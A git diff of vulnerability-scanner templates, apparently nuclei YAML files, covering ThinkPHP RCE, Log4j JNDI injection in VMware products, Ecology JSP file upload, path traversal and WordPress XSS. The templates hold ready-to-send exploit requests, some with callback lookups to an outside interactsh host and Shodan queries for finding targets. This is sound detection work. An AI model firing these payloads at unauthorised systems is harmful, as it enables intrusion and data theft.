-  reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/5.0.23-rce
-  tags: thinkphp,rce
+info:
+  name: ThinkPHP 5.0.23 RCE
+  author: dr_set
+  severity: critical
+  description: Thinkphp5 5.0(<5.0.24) Remote Code Execution.
+  reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/5.0.23-rce
+  tags: thinkphp,rce
 
-requests:
-  - method: POST
-    path:
-      - "{{BaseURL}}/index.php?s=captcha"
-
-    headers:
-      Content-Type: application/x-www-form-urlencoded
-
-    body: "_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "PHP Extension"
-          - "PHP Version"
-          - "ThinkPHP"
-        condition: and
-
-      - type: status
-        status:
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/index.php?s=captcha"
+
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+
+    body: "_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "PHP Extension"
+          - "PHP Version"
+          - "ThinkPHP"
+        condition: and
+
+      - type: status
+        status:
           - 200
\ No newline at end of file
diff --git a/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml b/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml
index e1fd12a08d..4fd517fcbe 100644
--- a/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml
+++ b/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml
@@ -7,7 +7,7 @@ info:
   description: ThinkPHP 5.0.9 includes verbose SQL error message that can reveal sensitive information including database credentials.
   reference:
     - https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/in-sqlinjection
-  tags: thinkphp
+  tags: thinkphp,vulhub
 
 requests:
   - method: GET
diff --git a/vulnerabilities/other/oa-tongda-path-traversal.yaml b/vulnerabilities/tongda/tongda-path-traversal.yaml
similarity index 62%
rename from vulnerabilities/other/oa-tongda-path-traversal.yaml
rename to vulnerabilities/tongda/tongda-path-traversal.yaml
index 0049e8c3f5..1e61db5ec2 100644
--- a/vulnerabilities/other/oa-tongda-path-traversal.yaml
+++ b/vulnerabilities/tongda/tongda-path-traversal.yaml
@@ -1,11 +1,17 @@
-id: oa-tongda-path-traversal
+id: tongda-path-traversal
 
 info:
-  name: OA TongDa Path Traversal
+  name: Office Anywhere TongDa - Path Traversal
   author: pikpikcu
   severity: critical
+  description: |
+    Office Anywhere (OA) is susceptible to path traversal vulnerabilities which can be leveraged to perform remote code execution.
   reference:
     - https://github.com/jas502n/OA-tongda-RCE
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
   tags: tongda,lfi
 
 requests:
@@ -19,17 +25,21 @@ requests:
 
     matchers-condition: and
     matchers:
+
       - type: word
-        words:
-          - "text/html"
-        part: header
-        condition: and
-      - type: word
+        part: body
         words:
           - "[mysql]"
           - "password="
-        part: body
         condition: and
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/05/30
diff --git a/vulnerabilities/other/tongda-session-disclosure.yaml b/vulnerabilities/tongda/tongda-session-disclosure.yaml
similarity index 100%
rename from vulnerabilities/other/tongda-session-disclosure.yaml
rename to vulnerabilities/tongda/tongda-session-disclosure.yaml
diff --git a/vulnerabilities/videoxpert-lfi.yaml b/vulnerabilities/videoxpert-lfi.yaml
new file mode 100644
index 0000000000..3c6bcef333
--- /dev/null
+++ b/vulnerabilities/videoxpert-lfi.yaml
@@ -0,0 +1,32 @@
+id: videoxpert-lfi
+
+info:
+  name: Schneider Electric Pelco VideoXpert Core Admin Portal - Directory Traversal
+  author: 0x_akoko
+  severity: high
+  description: Pelco VideoXpert suffers from a directory traversal vulnerability. Exploiting this issue will allow an unauthenticated attacker to view arbitrary files within the context of the web server.
+  reference:
+    - https://packetstormsecurity.com/files/143317/Schneider-Electric-Pelco-VideoXpert-Core-Admin-Portal-Directory-Traversal.html
+    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5419.php
+  metadata:
+    shodan-query: title:"VideoXpert"
+  tags: schneider,pelco,packetstorm,lfi,videoxpert
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/portal//..\\\..\\\..\\\..\\\windows\win.ini'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'bit app support'
+          - 'fonts'
+          - 'extensions'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/vmware/vmware-hcx-log4j.yaml b/vulnerabilities/vmware/vmware-hcx-log4j.yaml
new file mode 100644
index 0000000000..ff83e61dd3
--- /dev/null
+++ b/vulnerabilities/vmware/vmware-hcx-log4j.yaml
@@ -0,0 +1,55 @@
+id: vmware-hcx-log4j
+
+info:
+  name: VMware HCX - Remote Code Execution (Apache Log4j)
+  author: pussycat0x,DhiyaneshDK
+  severity: critical
+  reference:
+    - https://www.vmware.com/security/advisories/VMSA-2021-0028.html
+    - https://logging.apache.org/log4j/2.x/security.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
+  metadata:
+    verified: true
+    shodan-query: title:"VMware HCX"
+  tags: cve,cve2021,rce,jndi,log4j,vmware
+
+
+requests:
+  - raw:
+      - |
+        POST /hybridity/api/sessions HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
+        Accept: application/json
+        Accept-Language: en-US,en;q=0.5
+        Accept-Encoding: gzip, deflate
+        Content-Type: application/json
+        Origin: {{BaseURL}}
+
+        {
+          "authType": "password",
+          "username": "${jndi:ldap://${sys:os.name}.{{interactsh-url}}}",
+          "password": "admin"
+        }
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol  # Confirms the DNS Interaction
+        words:
+          - "dns"
+
+      - type: regex
+        part: interactsh_request
+        regex:
+          - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+'  # Match for extracted ${sys:os.name} variable
+
+    extractors:
+      - type: kval
+        kval:
+          - interactsh_ip # Print remote interaction IP in output
+      - type: regex
+        part: interactsh_request
+        group: 1
+        regex:
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'  # Print extracted ${sys:os.name} in output
diff --git a/vulnerabilities/vmware/vmware-horizon-log4j-jndi-rce.yaml b/vulnerabilities/vmware/vmware-horizon-log4j-jndi-rce.yaml
index ac05387a0c..dc7b93f6b8 100644
--- a/vulnerabilities/vmware/vmware-horizon-log4j-jndi-rce.yaml
+++ b/vulnerabilities/vmware/vmware-horizon-log4j-jndi-rce.yaml
@@ -3,12 +3,18 @@ id: vmware-horizon-log4j-jndi-rce
 info:
   name: VMware Horizon Log4j JNDI RCE
   author: johnk3r
-  severity: high
-  description: A critical vulnerability in Apache Log4j identified by CVE-2021-44228 has been publicly disclosed that may allow for remote code execution in impacted VMware Horizon.
+  severity: critical
+  description: |
+    A critical vulnerability in Apache Log4j identified by CVE-2021-44228 has been publicly disclosed that may allow for remote code execution in impacted VMware Horizon.
   reference:
     - https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis
     - https://www.vmware.com/security/advisories/VMSA-2021-0028.html
-  tags: rce,jndi,log4j,horizon,vmware
+    - https://logging.apache.org/log4j/2.x/security.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
+  metadata:
+    verified: true
+    shodan-query: http.html:"VMware Horizon"
+  tags: cve,cve2021,rce,jndi,log4j,horizon,vmware,oast
 
 requests:
   - raw:
diff --git a/vulnerabilities/vmware/vmware-nsx-log4j.yaml b/vulnerabilities/vmware/vmware-nsx-log4j.yaml
new file mode 100644
index 0000000000..7b00e75abe
--- /dev/null
+++ b/vulnerabilities/vmware/vmware-nsx-log4j.yaml
@@ -0,0 +1,53 @@
+id: vmware-nsx-log4j
+
+info:
+  name: VMware NSX - Remote Code Execution (Apache Log4j)
+  author: DhiyaneshDK
+  severity: critical
+  reference:
+    - https://kb.vmware.com/s/article/87086
+    - https://logging.apache.org/log4j/2.x/security.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
+  metadata:
+    verified: true
+    shodan-query: html:"vmw_nsx_logo-black-triangle-500w.png"
+  tags: cve,cve2021,rce,jndi,log4j,graylog
+
+
+requests:
+  - raw:
+      - |
+        POST /login HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+        Accept-Language: en-US,en;q=0.5
+        Accept-Encoding: gzip, deflate
+        Content-Type: application/x-www-form-urlencoded
+        Origin: {{BaseURL}}
+        Referer: {{BaseURL}}/login.jsp
+
+        username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&password=admin&submit=
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol  # Confirms the DNS Interaction
+        words:
+          - "dns"
+
+      - type: regex
+        part: interactsh_request
+        regex:
+          - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+'  # Match for extracted ${sys:os.name} variable
+
+    extractors:
+      - type: kval
+        kval:
+          - interactsh_ip # Print remote interaction IP in output
+
+      - type: regex
+        part: interactsh_request
+        group: 1
+        regex:
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'  # Print extracted ${sys:os.name} in output
diff --git a/vulnerabilities/vmware/vmware-operation-manager-log4j.yaml b/vulnerabilities/vmware/vmware-operation-manager-log4j.yaml
new file mode 100644
index 0000000000..f38cc511fe
--- /dev/null
+++ b/vulnerabilities/vmware/vmware-operation-manager-log4j.yaml
@@ -0,0 +1,57 @@
+id: vmware-operation-manager-log4j
+
+info:
+  name: VMware Operation Manager - Remote Code Execution (Apache Log4j)
+  author: DhiyaneshDK
+  severity: critical
+  reference:
+    - https://www.vmware.com/security/advisories/VMSA-2021-0028.html
+    - https://logging.apache.org/log4j/2.x/security.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
+  metadata:
+    verified: true
+    shodan-query: title:"vRealize Operations Manager"
+  tags: cve,cve2021,rce,jndi,log4j,vmware
+
+
+requests:
+  - raw:
+      - |
+        POST /ui/login.action HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
+        Accept: */*
+        Accept-Language: en-US,en;q=0.5
+        Accept-Encoding: gzip, deflate
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        X-Requested-With: XMLHttpRequest
+        Origin: {{BaseURL}}
+        Referer: {{BaseURL}}/ui/login.action
+        Sec-Fetch-Dest: empty
+        Sec-Fetch-Mode: cors
+        Sec-Fetch-Site: same-origin
+
+        mainAction=login&userName=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&password=admin&authSourceId=localItem&authSourceName=Local%20Users&authSourceType=LOCAL&forceLogin=&timezone=330&languageCode=us
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol  # Confirms the DNS Interaction
+        words:
+          - "dns"
+
+      - type: regex
+        part: interactsh_request
+        regex:
+          - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+'  # Match for extracted ${sys:os.name} variable
+
+    extractors:
+      - type: kval
+        kval:
+          - interactsh_ip # Print remote interaction IP in output
+
+      - type: regex
+        part: interactsh_request
+        group: 1
+        regex:
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'  # Print extracted ${sys:os.name} in output
diff --git a/vulnerabilities/vmware/vmware-vcenter-lfi-linux.yaml b/vulnerabilities/vmware/vmware-vcenter-lfi-linux.yaml
index a6ab46dae7..c696caa5bc 100644
--- a/vulnerabilities/vmware/vmware-vcenter-lfi-linux.yaml
+++ b/vulnerabilities/vmware/vmware-vcenter-lfi-linux.yaml
@@ -1,9 +1,14 @@
 id: vmware-vcenter-lfi-linux
 
 info:
-  name: Vmware Vcenter LFI for Linux appliances
+  name: Linux Vmware Vcenter - Local File Inclusion
   author: PR3R00T
   severity: high
+  description: Linux appliance based Vmware Vcenter is vulnerable to local file inclusion.
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
   tags: vmware,lfi,vcenter
 
 requests:
@@ -14,3 +19,5 @@ requests:
       - type: word
         words:
           - "vCenter Server"
+
+# Enhanced by mp on 2022/08/01
diff --git a/vulnerabilities/vmware/vmware-vcenter-lfi.yaml b/vulnerabilities/vmware/vmware-vcenter-lfi.yaml
index 53a04713d1..16980da65d 100644
--- a/vulnerabilities/vmware/vmware-vcenter-lfi.yaml
+++ b/vulnerabilities/vmware/vmware-vcenter-lfi.yaml
@@ -1,12 +1,17 @@
 id: vmware-vcenter-lfi
 
 info:
-  name: VMware vCenter Unauthenticated Arbitrary File Read
+  name: VMware vCenter - Local File Inclusion
   author: dwisiswant0
   severity: high
+  description: VMware vCenter is vulnerable to local file inclusion.
   reference:
     - https://kb.vmware.com/s/article/7960893
     - https://twitter.com/ptswarm/status/1316016337550938122
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
   tags: vmware,lfi,vcenter
 
 requests:
@@ -30,3 +35,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/01
diff --git a/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml b/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml
index b231e287be..1f621ea4ca 100644
--- a/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml
+++ b/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml
@@ -3,13 +3,18 @@ id: vmware-vcenter-log4j-jndi-rce
 info:
   name: VMware VCenter Log4j JNDI RCE
   author: _0xf4n9x_
-  severity: high
-  description: A critical vulnerability in Apache Log4j identified by CVE-2021-44228 has been publicly disclosed that may allow for remote code execution in impacted VMware VCenter.
+  severity: critical
+  description: |
+    A critical vulnerability in Apache Log4j identified by CVE-2021-44228 has been publicly disclosed that may allow for remote code execution in impacted VMware VCenter.
   reference:
     - https://www.vmware.com/security/advisories/VMSA-2021-0028.html
     - https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
     - https://twitter.com/tnpitsecurity/status/1469429810216771589
-  tags: rce,jndi,log4j,vcenter,vmware
+    - https://logging.apache.org/log4j/2.x/security.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
+  metadata:
+    shodan-query: title:"VMware VCenter"
+  tags: cve,cve2021,rce,jndi,log4j,vcenter,vmware,oast
 
 requests:
   - raw:
diff --git a/vulnerabilities/vmware/vmware-vcenter-ssrf.yaml b/vulnerabilities/vmware/vmware-vcenter-ssrf.yaml
index 9ee9d70874..23d3c6fa5c 100644
--- a/vulnerabilities/vmware/vmware-vcenter-ssrf.yaml
+++ b/vulnerabilities/vmware/vmware-vcenter-ssrf.yaml
@@ -1,9 +1,10 @@
 id: vmware-vcenter-ssrf
 
 info:
-  name: VMware vCenter SSRF/LFI/XSS
+  name: VMware vCenter - Server-Side Request Forgery/Local File Inclusion/Cross-Site Scripting
   author: pdteam
   severity: critical
+  description: VMware vCenter 7.0.2.00100 is susceptible to multiple vulnerabilities including server-side request forgery, local file inclusion, and cross-site scripting.
   reference:
     - https://github.com/l0ggg/VMware_vCenter
   tags: ssrf,lfi,xss,oast,vcenter,vmware
@@ -23,3 +24,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/05/31
diff --git a/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml b/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml
index 166fd6a2a0..e181522d35 100644
--- a/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml
+++ b/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml
@@ -4,17 +4,21 @@ info:
   name: VMware vRealize Operations Tenant App Log4j JNDI Remote Code Execution
   author: bughuntersurya
   severity: critical
-  description: VMware vRealize Operations is susceptible to a critical vulnerability in Apache Log4j which may allow remote code execution in an impacted vRealize Operations Tenant application.
+  description: |
+    VMware vRealize Operations is susceptible to a critical vulnerability in Apache Log4j which may allow remote code execution in an impacted vRealize Operations Tenant application.
   reference:
     - https://www.vmware.com/security/advisories/VMSA-2021-0028.html
     - https://core.vmware.com/vmsa-2021-0028-questions-answers-faq
     - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
     - https://nvd.nist.gov/vuln/detail/CVE-2021-45046
+    - https://logging.apache.org/log4j/2.x/security.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
   metadata:
+    verified: true
     shodan-query: http.title:"vRealize Operations Tenant App"
-  tags: rce,log4j,vmware,vrealize
+  tags: cve,cve2021,oast,rce,log4j,vmware,vrealize
 
 requests:
   - raw:
diff --git a/vulnerabilities/ecology/ecology-arbitrary-file-upload.yaml b/vulnerabilities/weaver/ecology/ecology-arbitrary-file-upload.yaml
similarity index 93%
rename from vulnerabilities/ecology/ecology-arbitrary-file-upload.yaml
rename to vulnerabilities/weaver/ecology/ecology-arbitrary-file-upload.yaml
index 1b96e89056..5c89a31b8f 100644
--- a/vulnerabilities/ecology/ecology-arbitrary-file-upload.yaml
+++ b/vulnerabilities/weaver/ecology/ecology-arbitrary-file-upload.yaml
@@ -18,7 +18,7 @@ requests:
         Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFy3iNVBftjP6IOwo
 
         ------WebKitFormBoundaryFy3iNVBftjP6IOwo
-        Content-Disposition: form-data; name="file"; filename="12.jsp"
+        Content-Disposition: form-data; name="file"; filename="{{randstr}}.jsp"
         Content-Type: application/octet-stream
 
         <%out.print(364536*876356);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
diff --git a/vulnerabilities/other/ecology-filedownload-directory-traversal.yaml b/vulnerabilities/weaver/ecology/ecology-filedownload-directory-traversal.yaml
similarity index 62%
rename from vulnerabilities/other/ecology-filedownload-directory-traversal.yaml
rename to vulnerabilities/weaver/ecology/ecology-filedownload-directory-traversal.yaml
index 61101d9fa7..68a90fbf88 100644
--- a/vulnerabilities/other/ecology-filedownload-directory-traversal.yaml
+++ b/vulnerabilities/weaver/ecology/ecology-filedownload-directory-traversal.yaml
@@ -1,11 +1,16 @@
 id: ecology-filedownload-directory-traversal
 
 info:
-  name: Ecology Directory Traversal
+  name: Ecology - Local File Inclusion
   author: princechaddha
-  severity: medium
+  severity: high
+  description: Ecology is vulnerable to local file inclusion.
   metadata:
     fofa-query: app="泛微-协同办公OA"
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
   tags: ecology,lfi
 
 requests:
@@ -21,3 +26,5 @@ requests:
         words:
           - "<url-pattern>/weaver/"
         part: body
+
+# Enhanced by mp on 2022/08/01
diff --git a/vulnerabilities/other/ecology-springframework-directory-traversal.yaml b/vulnerabilities/weaver/ecology/ecology-springframework-directory-traversal.yaml
similarity index 59%
rename from vulnerabilities/other/ecology-springframework-directory-traversal.yaml
rename to vulnerabilities/weaver/ecology/ecology-springframework-directory-traversal.yaml
index 38a7c94887..a40b3eee7c 100644
--- a/vulnerabilities/other/ecology-springframework-directory-traversal.yaml
+++ b/vulnerabilities/weaver/ecology/ecology-springframework-directory-traversal.yaml
@@ -1,9 +1,14 @@
 id: ecology-springframework-directory-traversal
 
 info:
-  name: Ecology Springframework Directory Traversal
+  name: Ecology Springframework - Local File Inclusion
   author: princechaddha
-  severity: medium
+  severity: high
+  description: Ecology Springframework is vulnerable to local file inclusion.
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
   tags: ecology,springframework,lfi
 
 requests:
@@ -19,3 +24,5 @@ requests:
         words:
           - "<url-pattern>/weaver/"
         part: body
+
+# Enhanced by mp on 2022/08/01
diff --git a/vulnerabilities/other/ecology-syncuserinfo-sqli.yaml b/vulnerabilities/weaver/ecology/ecology-syncuserinfo-sqli.yaml
similarity index 100%
rename from vulnerabilities/other/ecology-syncuserinfo-sqli.yaml
rename to vulnerabilities/weaver/ecology/ecology-syncuserinfo-sqli.yaml
diff --git a/vulnerabilities/other/ecology-v8-sqli.yaml b/vulnerabilities/weaver/ecology/ecology-v8-sqli.yaml
similarity index 100%
rename from vulnerabilities/other/ecology-v8-sqli.yaml
rename to vulnerabilities/weaver/ecology/ecology-v8-sqli.yaml
diff --git a/vulnerabilities/other/oa-v9-uploads-file.yaml b/vulnerabilities/weaver/oa-v9-uploads-file.yaml
similarity index 96%
rename from vulnerabilities/other/oa-v9-uploads-file.yaml
rename to vulnerabilities/weaver/oa-v9-uploads-file.yaml
index e0224cf506..bf7cef51a7 100644
--- a/vulnerabilities/other/oa-v9-uploads-file.yaml
+++ b/vulnerabilities/weaver/oa-v9-uploads-file.yaml
@@ -7,7 +7,7 @@ info:
   description: A vulnerability in OA V9 uploadOperation.jsp endpoint allows remote attackers to upload arbitrary files to the server. These files can be subsequently called and are executed by the remote software.
   reference:
     - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
-  tags: rce,jsp
+  tags: rce,jsp,fileupload,intrusive
 
 requests:
   - raw:
diff --git a/vulnerabilities/webp-server-go/webp-server-go-lfi.yaml b/vulnerabilities/webp-server-go/webp-server-go-lfi.yaml
new file mode 100644
index 0000000000..239b8e49ba
--- /dev/null
+++ b/vulnerabilities/webp-server-go/webp-server-go-lfi.yaml
@@ -0,0 +1,27 @@
+id: webp-server-go-lfi
+
+info:
+  name: Webp server go - Local File Inclusion
+  author: pikpikcu
+  severity: high
+  reference:
+    - https://github.com/webp-sh/webp_server_go/issues/92
+  metadata:
+    verified: true
+    shodan-query: http.html:"Webp"
+  tags: lfi,webp
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/wordpress/404-to-301-xss.yaml b/vulnerabilities/wordpress/404-to-301-xss.yaml
new file mode 100644
index 0000000000..8b83ef8a27
--- /dev/null
+++ b/vulnerabilities/wordpress/404-to-301-xss.yaml
@@ -0,0 +1,50 @@
+id: 404-to-301-xss
+
+info:
+  name: WordPress 404 to 301 Log Manager <3.1.2 - Cross-Site Scripting
+  author: Akincibor
+  severity: medium
+  description: WordPress 404 to 301 Log Manager 3.1.2 does not escape some URLs before outputting them back in attributes, leading to reflected cross-site scripting.
+  reference:
+    - https://wpscan.com/vulnerability/4a310b4f-79fa-4b74-93f8-e4522921abe1
+    - https://wordpress.org/plugins/404-to-301
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
+  tags: wpscan,wp-plugin,xss,wp,wordpress,authenticated
+
+requests:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+      - |
+        GET /wp-admin/admin.php?page=jj4t3-logs&a"><script>alert(1)</script> HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"><script>alert(1)</script>'
+          - '404 Error Logs'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/09/07
diff --git a/vulnerabilities/wordpress/accessibility-helper-xss.yaml b/vulnerabilities/wordpress/accessibility-helper-xss.yaml
deleted file mode 100644
index e1b5a6ec3a..0000000000
--- a/vulnerabilities/wordpress/accessibility-helper-xss.yaml
+++ /dev/null
@@ -1,31 +0,0 @@
-id: accessibility-helper-xss
-
-info:
-  name: WP Accessibility Helper (WAH) < 0.6.0.7 - Reflected Cross-Site Scripting (XSS)
-  author: dhiyaneshDK
-  severity: medium
-  description: The plugin does not sanitise and escape the wahi parameter before outputting back its base64 decode value in the page, leading to a Reflected Cross-Site Scripting issue.
-  reference:
-    - https://wpscan.com/vulnerability/7142a538-7c3d-4dd0-bd2c-cbd2efaf53c5
-  tags: xss,wordpress,wp-plugin,wp
-
-requests:
-  - method: GET
-    path:
-      - '{{BaseURL}}/?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v'
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - "var wah_target_src = '';alert(document.domain);//';"
-
-      - type: word
-        part: header
-        words:
-          - text/html
-
-      - type: status
-        status:
-          - 200
diff --git a/vulnerabilities/wordpress/ad-widget-lfi.yaml b/vulnerabilities/wordpress/ad-widget-lfi.yaml
index 62964352e5..d5b2f51334 100644
--- a/vulnerabilities/wordpress/ad-widget-lfi.yaml
+++ b/vulnerabilities/wordpress/ad-widget-lfi.yaml
@@ -1,14 +1,20 @@
 id: ad-widget-lfi
 
 info:
-  name: WordPress Plugin WordPress Ad Widget Local File Inclusion (2.11.0)
+  name: WordPress Ad Widget 2.11.0 - Local File Inclusion
   author: 0x_Akoko
   severity: high
-  description: Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks.
+  description: |
+    WordPress Ad Widget 2.11.0 is vulnerable to local file inclusion. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks.
   reference:
     - https://cxsecurity.com/issue/WLB-2017100084
     - https://plugins.trac.wordpress.org/changeset/1628751/ad-widget
-  tags: wordpress,wp-plugin,lfi
+    - https://wpscan.com/vulnerability/caca21fe-56bf-4d4c-afc8-4a218e52f0a2
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
+  tags: wordpress,wp-plugin,lfi,wp,adWidget,wpscan
 
 requests:
   - method: GET
@@ -17,7 +23,6 @@ requests:
 
     matchers-condition: and
     matchers:
-
       - type: regex
         regex:
           - "root:[x*]:0:0"
@@ -25,3 +30,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/01
diff --git a/vulnerabilities/wordpress/admin-word-count-column-lfi.yaml b/vulnerabilities/wordpress/admin-word-count-column-lfi.yaml
deleted file mode 100644
index fd86eaf40f..0000000000
--- a/vulnerabilities/wordpress/admin-word-count-column-lfi.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-id: admin-word-count-column-lfi
-
-info:
-  name: Admin word count column 2.2 - Arbitrary File Retrieval
-  author: daffainfo,Splint3r7
-  severity: high
-  reference:
-    - https://packetstormsecurity.com/files/166476/WordPress-Admin-Word-Count-Column-2.2-Local-File-Inclusion.html
-    - https://wordpress.org/plugins/admin-word-count-column/
-  tags: wordpress,wp-plugin,lfi,wp
-
-requests:
-  - method: GET
-    path:
-      - '{{BaseURL}}/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\0'
-
-    matchers-condition: and
-    matchers:
-      - type: regex
-        regex:
-          - "root:[x*]:0:0"
-
-      - type: status
-        status:
-          - 200
diff --git a/vulnerabilities/wordpress/advanced-access-manager-lfi.yaml b/vulnerabilities/wordpress/advanced-access-manager-lfi.yaml
index 9838f210f1..22f5356edb 100644
--- a/vulnerabilities/wordpress/advanced-access-manager-lfi.yaml
+++ b/vulnerabilities/wordpress/advanced-access-manager-lfi.yaml
@@ -1,14 +1,20 @@
 id: advanced-access-manager-lfi
 
 info:
-  name: Advanced Access Manager < 5.9.9 - Unauthenticated Local File Inclusion
+  name: WordPress Advanced Access Manager < 5.9.9 - Local File Inclusion
   author: 0x_Akoko
   severity: high
-  description: The Advanced Access Manager WordPress plugin, versions before 5.9.9, allowed reading arbitrary files. This way one can download the wp-config.php file and get access to the database, which is publicly reachable on many servers.
+  description: |
+    WordPress Advanced Access Manager versions before 5.9.9 are vulnerable to local file inclusion and allows attackers to download the wp-config.php file and get access to the database, which is publicly reachable on many servers.
   reference:
     - https://wpscan.com/vulnerability/9873
     - https://id.wordpress.org/plugins/advanced-access-manager/
-  tags: wordpress,wp-plugin,lfi
+    - https://wpscan.com/vulnerability/dfe62ff5-956c-4403-b3fd-55677628036b
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
